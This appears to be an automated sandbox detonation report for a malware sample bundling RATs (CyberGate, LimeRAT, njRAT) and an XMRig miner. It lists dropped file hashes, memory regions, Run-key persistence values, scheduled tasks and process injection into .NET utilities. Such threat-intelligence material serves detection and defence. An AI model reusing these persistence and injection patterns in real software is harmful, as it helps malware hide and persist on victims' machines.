memory/1632-89-0x0000000000080000-0x00000000000CC000-memory.dmp
memory/1632-91-0x0000000000080000-0x00000000000CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/1548-87-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
memory/1632-105-0x000000000008BBCC-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1632-107-0x0000000000080000-0x00000000000CC000-memory.dmp
\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
memory/592-112-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
memory/1560-116-0x0000000000090000-0x000000000009C000-memory.dmp
memory/1632-115-0x0000000000080000-0x00000000000CC000-memory.dmp
memory/1560-118-0x0000000000090000-0x000000000009C000-memory.dmp
memory/1560-122-0x000000000009823E-mapping.dmp
memory/1560-123-0x0000000000090000-0x000000000009C000-memory.dmp
memory/1560-124-0x0000000000090000-0x000000000009C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
| MD5 | a38702ff13a83f2177bb45d99f4f6e4e |
| SHA1 | 198b0c4f73781639d40d90b7c55221ebaaadc477 |
| SHA256 | 988d9329c8f0d9a030cbede1aefac3e28640fc7e63aafa1d8e9a4a3800563926 |
| SHA512 | 50037432bbb01df72a0f0254726e6743d5c703895b35b884ce8df93a0e265095a8683c7b68a78f17115da81d98777c4f0bb93593717c6c0d9c3d14f134b898d3 |
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1896-129-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1820-132-0x00000000001A0000-0x0000000000830000-memory.dmp
memory/1340-135-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1340-139-0x000000000040823E-mapping.dmp
memory/1340-140-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1340-141-0x0000000000400000-0x000000000040C000-memory.dmp
memory/1632-142-0x0000000010410000-0x0000000010471000-memory.dmp
memory/1896-145-0x0000000010410000-0x0000000010471000-memory.dmp
memory/1896-147-0x0000000010410000-0x0000000010471000-memory.dmp
memory/592-148-0x00000000003D0000-0x0000000000486000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XX--XX--XX.txt
| MD5 | 06c726690de1e0bf2ee467d6da373c60 |
| SHA1 | f98af670a712cfc223c444d6beb0803642054260 |
| SHA256 | d884fb142b4dd02afc9e7a903cd5ef618d39525b31ff35edbaa79a4e768738fc |
| SHA512 | 90716d4b014333d9eefb86576d29c5ee45aaa7e20cc3266e82860c084d8fda17611d08b05ccc23f0e16affe73ab6dd209a446cfa805fbb3c5ecf95fe7b5f418e |
\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1740-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\c.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1560-155-0x00000000733E0000-0x000000007398B000-memory.dmp
memory/1896-156-0x0000000010410000-0x0000000010471000-memory.dmp
memory/592-157-0x0000000000490000-0x00000000004EA000-memory.dmp
memory/1128-158-0x0000000000000000-mapping.dmp
memory/1720-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
| MD5 | 222f649af364623037bda8ee9df02945 |
| SHA1 | f5e1ecb12628b69eeb29ab47d64283122316bd5e |
| SHA256 | 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30 |
| SHA512 | c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64 |
memory/956-160-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
| MD5 | 222f649af364623037bda8ee9df02945 |
| SHA1 | f5e1ecb12628b69eeb29ab47d64283122316bd5e |
| SHA256 | 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30 |
| SHA512 | c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64 |
\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
| MD5 | 222f649af364623037bda8ee9df02945 |
| SHA1 | f5e1ecb12628b69eeb29ab47d64283122316bd5e |
| SHA256 | 0b17861e7deb4cbb840fc8bc5832c08623f2887e00ef0f545973d23c9b5aee30 |
| SHA512 | c56a2496168fb0f00b7a8bf59c1c570940a8724a9ed7c530f0edbfff0aedc4517be9d63d1b3511ef759932e30064b1824f77ff1db3f8ab9f51b521dc82efcb64 |
memory/936-165-0x0000000000000000-mapping.dmp
memory/1388-166-0x0000000000000000-mapping.dmp
memory/1696-167-0x0000000000000000-mapping.dmp
memory/592-168-0x0000000000385000-0x0000000000396000-memory.dmp
memory/932-171-0x0000000000400000-0x000000000040C000-memory.dmp
memory/932-176-0x000000000040748E-mapping.dmp
memory/932-177-0x0000000000400000-0x000000000040C000-memory.dmp
memory/932-178-0x0000000000400000-0x000000000040C000-memory.dmp
memory/932-180-0x00000000733E0000-0x000000007398B000-memory.dmp
memory/972-181-0x0000000000000000-mapping.dmp
memory/1460-183-0x0000000000000000-mapping.dmp
memory/572-187-0x0000000000000000-mapping.dmp
memory/880-186-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | dfd75a7bf3505b1451149b8d73a359ae |
| SHA1 | 8db9aa88468ce61ffa43eaa195aff0eb359310b6 |
| SHA256 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d |
| SHA512 | 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365 |
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
memory/336-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
memory/1192-191-0x0000000000000000-mapping.dmp
memory/892-193-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/1440-203-0x000000000040823E-mapping.dmp
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | dfd75a7bf3505b1451149b8d73a359ae |
| SHA1 | 8db9aa88468ce61ffa43eaa195aff0eb359310b6 |
| SHA256 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d |
| SHA512 | 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365 |
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/700-223-0x000000000008BBCC-mapping.dmp
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/2108-234-0x000000000009823E-mapping.dmp
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
memory/1192-239-0x0000000001180000-0x0000000001810000-memory.dmp
memory/2108-240-0x00000000733E0000-0x000000007398B000-memory.dmp
memory/2412-241-0x0000000000000000-mapping.dmp
memory/2488-242-0x0000000000000000-mapping.dmp
memory/2528-243-0x0000000000000000-mapping.dmp
memory/2740-252-0x000000000040748E-mapping.dmp
memory/2740-256-0x00000000733E0000-0x000000007398B000-memory.dmp
memory/2848-257-0x0000000000000000-mapping.dmp
memory/2924-258-0x0000000000000000-mapping.dmp
memory/2936-259-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\efsui\data.exe
| MD5 | ffc5e092773e0832f96d6c284ada0207 |
| SHA1 | 92933ecdcd09eb4751cce792d85d83c5fd5d3071 |
| SHA256 | fca838378cc164ed30f6fe6c0d81aea2ac6cbe65fe3afc174b8a11451fb49546 |
| SHA512 | ebe8ae3a31a31d93a7180e716bdcfd254ee987538cca0746bffcaee9a154eba114b83762e338bb0514f2670db385e5525d9ecb6d5d24c636fbab67c84acb9d85 |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/2956-261-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
| MD5 | dfd75a7bf3505b1451149b8d73a359ae |
| SHA1 | 8db9aa88468ce61ffa43eaa195aff0eb359310b6 |
| SHA256 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d |
| SHA512 | 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365 |
memory/2996-265-0x0000000000000000-mapping.dmp
memory/2988-266-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
| MD5 | fb9529e54e1b1bb55666d5df8aeb888a |
| SHA1 | 35c70da317dffd7872c4a4c514162e8ac46c95d3 |
| SHA256 | 405af27d2e97f3a2913284175a017042f3ada233be77b16d91f63753a5e8b388 |
| SHA512 | e3f1b0abc32333b487ddfd3849f4a6e85b677b21cf52bbaebbe753a648d1002a3029f70ffb07ba6825897058e74700f7a0150d0a615e8e19ac6ab2ee42e2ab54 |
memory/3036-276-0x000000000040823E-mapping.dmp
C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
| MD5 | 398ec8f86f7fa6496441719de64b247a |
| SHA1 | 16906927268cc0d1c4722f6f2dc2045f8725826c |
| SHA256 | 7de324eecd765149b04bf2dc5c7e490602b3a95b4ec8a6b549f79ba69c279e63 |
| SHA512 | 029e46cf1d786970487deba06f241140f9ee350c475114cfda270d6ae93c3819445c87276e5970ddcdf8b48873107b941216420de7a4fee866aae8523d4a778e |
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
| MD5 | b712972e8c92249a42ae00df0ecfc6fd |
| SHA1 | f3dbc46c155296cca4435cefc6ddd8e22e82b2cb |
| SHA256 | 16a422e7efd7e74300be8108bffde19bd104c2c8f84c2ce5e4643da2cd0a4d7f |
| SHA512 | 1c23b0faed55b93027f08854e2e1f03ef90f3873a21692fe9f35f4ca9b12956598cf645b58b26010bc8fe3028d1b91db5fb4c76893d5219f8783ee5f7404bf65 |
memory/3028-293-0x00000000000CBBCC-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\li4.exe
| MD5 | 7d3d55fcf649639e1d4f1ed8040259d7 |
| SHA1 | 13d477f24bf7b471321a10031029e73bc1539d7b |
| SHA256 | b586257b3bcde72f60a2a1ee10fa8c82555fd64914b937ea1ea447f0c9afeabb |
| SHA512 | 57cf83f94c534360b4936add8f92e07048df71fe7120aec19f6bfb96d0f63037c92abdb24c2f09611d27ea271615819cf4df260a49d4dbe09580bed047350861 |
C:\Users\Admin\AppData\Local\Temp\n.exe
| MD5 | 33f2cf749fe3208aa8254a9075e8f8e0 |
| SHA1 | 3278e5683c83fd524ad22eeaecd7ef03d16f7f54 |
| SHA256 | 0a98ba2c46bd3e53d6d95b5cb4675638669be16e0939100944ae518a0fe78610 |
| SHA512 | 9682077c1f2e37555fa17425c49148b7bb9ee365692e1e71b6be3dc457fa937ad2bbe0f458725cb4d39edd6cb89ea3871d3a02f75b71d3bd2198ee59d32ac62b |
memory/2176-306-0x000000000040823E-mapping.dmp
memory/2176-310-0x00000000733E0000-0x000000007398B000-memory.dmp
memory/2312-311-0x0000000000000000-mapping.dmp
memory/560-312-0x0000000000000000-mapping.dmp
memory/2504-313-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-25 01:11
Reported
2022-05-25 01:16
Platform
win10v2004-20220414-en
Max time kernel
24s
Max time network
168s
Command Line
Signatures
CyberGate, Rebhip
LimeRAT
njRAT/Bladabindi
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\li4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Modifies Windows Firewall
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\li4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\moxia.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4708 set thread context of 2128 | N/A | C:\Users\Admin\AppData\Local\Temp\li4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3004 set thread context of 408 | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | C:\Users\Admin\AppData\Local\Temp\c.exe |
| PID 3232 set thread context of 2064 | N/A | C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 | C:\Users\Admin\AppData\Local\Temp\n.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | N/A |
